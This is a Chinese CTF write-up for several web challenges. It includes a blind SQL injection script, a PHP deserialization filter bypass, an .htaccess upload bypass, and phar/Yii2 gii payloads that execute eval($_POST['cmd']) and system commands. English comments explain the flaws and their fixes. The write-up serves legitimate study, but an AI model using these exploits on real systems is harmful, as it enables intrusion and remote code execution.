web
easysqli
扫描目录发现login.php
User-Agent: universe PC
Accept: application/flag
注入点:index.php?id=
/index.php?id=1'%26%26if(ascii(substr((select%09database()),1,1))>0,1,0)--%09
# -*- coding: utf-8 -*-
# @Time : 2022/9/26 9:17
# @Author : pysnow
import requests
import re
# web2
# atable,flag,users
# 5.7.31
# Target URL; this first assignment is dead code, overwritten on the next line.
url = ''
# {} receives the boolean condition. The query string uses %26%26 (&&) and a
# trailing tab (\x09) instead of a space after the comment marker.
url = "http://39.107.234.204:40957/index.php?id=1'%26%26if({},1,0)--\x09"
# Boolean-based blind extraction: compares the ASCII code of the i-th character
# of the group_concat'ed column against a guess. Every space in the SQL is
# replaced by a tab before it is sent.
payload = "ascii(substr((select group_concat(a.2) from (select 1,2 union select * from users)a),{},1))>{}".replace(
    " ", '\x09')
result = ''
# Defined but never passed to requests.get(), so requests do not go through it.
proxy = {"http": "127.0.0.1:8080"}
for i in range(1, 100):
    # Binary search over the ASCII range 27..149, roughly seven requests per
    # character; up to 99 characters are probed, with no early exit.
    head = 27
    tail = 150
    while head < tail:
        mid = (head + tail) >> 1
        final = url.format(payload.format(i, mid))
        # print(final)
        r = requests.get(final)
        # print(r.text[2980:])
        # The page is assumed to contain this marker only when the injected
        # condition evaluates true (presumably the normal id=1 page).
        if '星球名字' in r.text:
            head = mid + 1
        else:
            tail = mid
    # NOTE: beyond the end of the data ascii(substr(...)) is 0, so the search
    # converges to head == 27 and chr(27) is appended for each remaining i.
    result += chr(head)
    print(result)
通过这个注入得到数据
(自己替换空格)
表名:
select group_concat(table_name)from sys.schema_table_statistics_with_buffer where table_schema=database()
atable,flag,users
无列名注入:
select group_concat(a.2) from (select 1,2 union select * from users)a
flag表
数据:flag_is_in_login.php
users表
数据:
用户名:administrator
密码:oh_you_got_my_password
接着直接在login.php修改一下UA头和Accept头换成指定的关键词登录就行了
upload
http://39.107.75.148:21106/index.php?source=1拿到源码
/**
 * Challenge source. The flag decision is made in the destructor, i.e. when the
 * unserialized object is released, not when it is created, so merely building
 * the object is enough to reach this code. $value is protected, which only
 * changes how the property name is encoded in the serialized form; it does not
 * stop unserialize() from populating it.
 */
class Gethint{
    protected $value=0;
    public function __destruct(){
        echo $this->value;
        // Loose comparison: 1, "1", 1.0 and true all satisfy this branch.
        if($this->value==1)
            show_flag();
        else
            die('nonono');
    }
}
// Root issue: unserialize() is fed straight from the query string, so any
// loadable class can be instantiated with attacker-chosen property values.
// Untrusted data should be decoded with json_decode(); if unserialize() is
// unavoidable, restrict it with the allowed_classes option.
$hh=$_GET['hh'];
// Denylist applied once and non-recursively: removing the substring can leave
// the forbidden word behind, so this is not an effective control.
$hh=str_replace('Gethint', '', $hh);
unserialize($hh);
<?php
// Mirrors the target's class name and property; only the default value differs.
class Gethint{
    protected $value=1;
}
// Serialized form of a Gethint with value=1. Because the property is
// protected its serialized name carries NUL bytes ("\0*\0value"), which is
// why the result is urlencoded before being placed in the query string.
$final = serialize(new Gethint);
// Survives the target's single, non-recursive str_replace('Gethint', '', ...):
// once the inner occurrence is removed, the original name remains. The
// server-side fix is not to unserialize() user input at all.
$final = str_replace('Gethint','GethGethintint',$final);
echo urlencode($final);
9d7503608bf089e2ffb4fdb7ad1ccd23.php
过滤了php标签,而且又是php5.7以下,可以直接使用php 前端标签,这里我直接使用base64编码绕过
# .htaccess dropped into the upload directory: the first directive hands .jpg
# files to the PHP handler, the second appends the base64-decoded upload to
# every PHP response. Both are only honoured where AllowOverride permits them;
# serving user uploads with AllowOverride None (and with PHP disabled for that
# directory) is the usual mitigation.
AddType application/x-httpd-php .jpg
php_value auto_append_file php://filter/convert.base64-decode/resource=/var/www/html/upload/820097d390f6d5aa076fb0d1721b0aa4/1.jpg
codereview
yii2框架主控制器源码如下
<?php
namespace app\controllers;
use Yii;
use yii\filters\AccessControl;
use yii\web\BadRequestHttpException;
use yii\web\Controller;
use yii\web\ForbiddenHttpException;
use yii\web\Response;
use yii\web\UploadedFile;
use yii\filters\VerbFilter;
use app\models\LoginForm;
use app\models\ContactForm;
use app\models\UploadForm;
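class SiteController extends Controller
{
    /**
     * Directory uploads are written to.
     *
     * NOTE(review): the original hard-coded this absolute path; it appears to
     * sit under the document root, so stored files are directly reachable
     * over HTTP. Resolving it via Yii::getAlias('@webroot') or moving uploads
     * outside the web root should be confirmed with the deployment.
     */
    const UPLOAD_DIR = 'D:/phpstudy_pro/WWW/5space/uploads/';

    /**
     * {@inheritdoc}
     *
     * Access control and the POST-only verb filter are scoped to logout; every
     * other action, including upload, is reachable without authentication.
     */
    public function behaviors()
    {
        return [
            'access' => [
                'class' => AccessControl::className(),
                'only' => ['logout'],
                'rules' => [
                    [
                        'actions' => ['logout'],
                        'allow' => true,
                        'roles' => ['@'],
                    ],
                ],
            ],
            'verbs' => [
                'class' => VerbFilter::className(),
                'actions' => [
                    'logout' => ['post'],
                ],
            ],
        ];
    }

    /**
     * {@inheritdoc}
     */
    public function actions()
    {
        return [
            'error' => [
                'class' => 'yii\web\ErrorAction',
            ],
            'captcha' => [
                'class' => 'yii\captcha\CaptchaAction',
                // A fixed captcha answer exists only in the test environment.
                'fixedVerifyCode' => YII_ENV_TEST ? 'testme' : null,
            ],
        ];
    }

    /**
     * Displays homepage.
     *
     * @return string
     */
    public function actionIndex()
    {
        return $this->render('index');
    }

    /**
     * Login action.
     *
     * Already-authenticated users are sent home; otherwise the posted
     * credentials are handed to LoginForm.
     *
     * @return Response|string
     */
    public function actionLogin()
    {
        if (!Yii::$app->user->isGuest) {
            return $this->goHome();
        }

        $model = new LoginForm();
        if ($model->load(Yii::$app->request->post()) && $model->login()) {
            return $this->goBack();
        }

        // Cleared so the re-rendered form does not echo the submitted password.
        $model->password = '';

        return $this->render('login', [
            'model' => $model,
        ]);
    }

    /**
     * Logout action.
     *
     * @return Response
     */
    public function actionLogout()
    {
        Yii::$app->user->logout();

        return $this->goHome();
    }

    /**
     * Displays about page.
     *
     * @return string
     */
    public function actionAbout()
    {
        return $this->render('about');
    }

    /**
     * Handles the upload form.
     *
     * On POST the file is run through UploadForm's validation rules (not
     * visible here; they must allow-list extensions and MIME types, because
     * the stored name keeps the client-supplied extension) and written to
     * UPLOAD_DIR. Only the stored file name is reported back; the original
     * code returned the absolute server path, disclosing the filesystem
     * layout, and ignored the result of saveAs().
     *
     * @return string|Response the stored file name, a JSON error document, or the rendered form
     */
    public function actionUpload()
    {
        $model = new UploadForm();
        if (!Yii::$app->request->isPost) {
            return $this->render('upload', ['model' => $model]);
        }

        $model->file = UploadedFile::getInstance($model, 'file');
        if (!$model->file || !$model->validate()) {
            return json_encode($model->errors);
        }

        $name = $model->file->baseName . '.' . $model->file->extension;
        // saveAs() returns false when the move fails; report that instead of
        // claiming the file was stored.
        if (!$model->file->saveAs(self::UPLOAD_DIR . $name)) {
            return json_encode(['file' => ['Failed to store the uploaded file.']]);
        }

        return $name;
    }
}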
起了个环境,发现版本是2.0.45,网上没找到现成的链子,但是在upload目录下给了phar链子(好心的出题人,uploads/phar.jpg),也有上传文件点,直接找触发点
O:41:"PhpOffice\PhpSpreadsheet\Shared\XMLWriter":1:{s:55:" PhpOffice\PhpSpreadsheet\Shared\XMLWriter tempFileName";O:28:"GuzzleHttp\Psr7\AppendStream":2:{s:37:" GuzzleHttp\Psr7\AppendStream streams";a:1:{i:0;O:29:"GuzzleHttp\Psr7\CachingStream":2:{s:43:" GuzzleHttp\Psr7\CachingStream remoteStream";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";b:0;}s:6:"stream";O:26:"GuzzleHttp\Psr7\PumpStream":3:{s:34:" GuzzleHttp\Psr7\PumpStream source";C:32:"Opis\Closure\SerializableClosure":187:{a:5:{s:3:"use";a:0:{}s:8:"function";s:32:"function(){eval($_POST['cmd']);}";s:5:"scope";s:26:"GuzzleHttp\Psr7\PumpStream";s:4:"this";N;s:4:"self";s:32:"000000007a36b6140000000073ec9443";}}s:32:" GuzzleHttp\Psr7\PumpStream size";i:-10;s:34:" GuzzleHttp\Psr7\PumpStream buffer";O:22:"Faker\DefaultGenerator":1:{s:10:" * default";s:1:"j";}}}}s:38:" GuzzleHttp\Psr7\AppendStream seekable";b:1;}}
后面有空可以复现一下这个链子
这道题开了debug模式,用的是gii组件,访问:http://39.107.243.76:18517/index.php?r=gii 然后添加扩展
Generator[vendorName]=pysnow&Generator[packageName]=yii2-pysnow&Generator[namespace]=\pysnow\&Generator[type]=yii2-extension&Generator[keywords]=yii2,extension&Generator[license]=Apache-2.0&Generator[title]=pysnow&Generator[description]=pysnow&Generator[authorName]=pysnow&Generator[authorEmail]=pysnow@qq.com&Generator[outputPath]=phar:///tmp/phar.jpg&Generator[template]=default&preview=&cmd=system('cat /flag');
post传参cmd参数,然后RCE